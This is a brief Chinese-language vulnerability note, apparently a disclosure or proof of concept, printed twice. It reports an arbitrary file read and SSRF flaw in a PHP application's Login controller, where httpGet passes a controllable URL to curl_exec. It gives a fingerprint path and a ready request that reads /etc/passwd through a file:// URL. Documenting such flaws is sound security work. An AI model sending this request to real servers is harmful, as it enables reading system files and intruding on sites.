/app/api/controller/Login.php 控制器中,httpGet方法存在curl_exec函数,且传参可控,导致任意文件读取+SSRF漏洞
"/static/index/js/jweixin-1.2.0.js"
/index.php/api/login/httpGet?url=file:///etc/passwd
/app/api/controller/Login.php 控制器中,httpGet方法存在curl_exec函数,且传参可控,导致任意文件读取+SSRF漏洞
"/static/index/js/jweixin-1.2.0.js"
/index.php/api/login/httpGet?url=file:///etc/passwd
